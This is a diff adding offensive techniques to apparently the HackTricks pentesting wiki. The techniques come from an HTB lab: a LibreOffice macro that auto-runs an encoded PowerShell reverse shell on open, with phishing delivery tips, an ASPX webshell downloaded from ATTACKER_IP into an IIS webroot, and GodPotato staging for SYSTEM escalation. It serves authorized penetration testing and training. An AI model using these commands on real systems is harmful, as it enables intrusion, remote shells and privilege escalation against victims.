HackTricks-wiki · carlospolop · Jan 26, 2026
diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md
@@ -83,6 +83,23 @@ Do this because you **can't save macro's inside a `.docx`** and there's a **stig
   - [**macphish**](https://github.com/cldrn/macphish)
   - [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
 
+## LibreOffice ODT auto-run macros (Basic)
+
+LibreOffice Writer documents can embed Basic macros and auto-execute them when the file is opened by binding the macro to the **Open Document** event (Tools → Customize → Events → Open Document → Macro…). A simple reverse shell macro looks like:
+
+```vb
+Sub Shell
+    Shell("cmd /c powershell -enc BASE64_PAYLOAD"""")
+End Sub
+```
+
+Note the doubled quotes (`""`) inside the string – LibreOffice Basic uses them to escape literal quotes, so payloads that end with `...==""")` keep both the inner command and the Shell argument balanced.
+
+Delivery tips:
+
+- Save as `.odt` and bind the macro to the document event so it fires immediately when opened.
+- When emailing with `swaks`, use `--attach @resume.odt` (the `@` is required so the file bytes, not the filename string, are sent as the attachment). This is critical when abusing SMTP servers that accept arbitrary `RCPT TO` recipients without validation.
+
 ## HTA Files
 
 An HTA is a Windows program that **combines HTML and scripting languages (such as VBScript and JScript)**. It generates the user interface and executes as a "fully trusted" application, without the constraints of a browser's security model.
@@ -293,6 +310,7 @@ Check the page about **places to steal NTLM creds**:
 
 ## References
 
+- [HTB Job – LibreOffice macro → IIS webshell → GodPotato](https://0xdf.gitlab.io/2026/01/26/htb-job.html)
 - [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
 - [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)
 - [Unit 42 – PhantomVAI Loader Delivers a Range of Infostealers](https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/)

diff --git a/...network-services-pentesting/pentesting-web/iis-internet-information-services.md b/...network-services-pentesting/pentesting-web/iis-internet-information-services.md
@@ -9,6 +9,20 @@ Test executable file extensions:
 - config
 - php
 
+## Writable webroot → ASPX command shell
+
+If a low-privileged user/group has **write access to `C:\inetpub\wwwroot`**, you can drop an ASPX webshell and execute OS commands as the application pool identity (often holding **SeImpersonatePrivilege**).
+
+- Verify ACLs: `icacls C:\inetpub\wwwroot` or `cacls .` looking for `(F)` on your user/group.
+- Upload a command webshell (e.g., fuzzdb/tennc `cmd.aspx`) using PowerShell:
+
+```powershell
+iwr http://ATTACKER_IP/shell.aspx -OutFile C:\inetpub\wwwroot\shell.aspx
+```
+
+- Request `/shell.aspx` and run commands; identity typically shows `iis apppool\defaultapppool`.
+- Combine with Potato-family LPE (e.g., GodPotato/SigmaPotato) when the AppPool token has SeImpersonatePrivilege to pivot to SYSTEM.
+
 ## Internal IP Address disclosure
 
 On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:
@@ -409,6 +423,7 @@ HTTP/1.1 200 OK
 
 ## References
 
+- [0xdf – HTB Job (IIS write → ASPX shell → GodPotato)](https://0xdf.gitlab.io/2026/01/26/htb-job.html)
 - [Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/)
 - [AMSI/ETW bypass background (HackTricks)](../../windows-hardening/av-bypass.md)
 

diff --git a/...ws-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/...ws-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -160,6 +160,16 @@ EfsPotato <cmd> [pipe]
 
 Notes:
 - Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present.
+- Grab the binary that matches the installed runtime (e.g., `GodPotato-NET4.exe` on modern Server 2022).
+- If your initial execution primitive is a webshell/UI with short timeouts, stage the payload as a script and ask GodPotato to run it instead of a long inline command.
+
+Quick staging pattern from a writable IIS webroot:
+
+```powershell
+iwr http://ATTACKER_IP/GodPotato-NET4.exe -OutFile gp.exe
+iwr http://ATTACKER_IP/shell.ps1 -OutFile shell.ps1  # contains your revshell
+./gp.exe -cmd "powershell -ep bypass C:\inetpub\wwwroot\shell.ps1"
+```
 
 ### DCOMPotato
 
@@ -201,6 +211,7 @@ SigmaPotato adds modern niceties like in-memory execution via .NET reflection an
 - [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
 - [FullPowers – Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers)
 - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
+- [HTB: Job — LibreOffice macro → IIS webshell → GodPotato to SYSTEM](https://0xdf.gitlab.io/2026/01/26/htb-job.html)
 - [BeichenDream/PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato)
 - [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)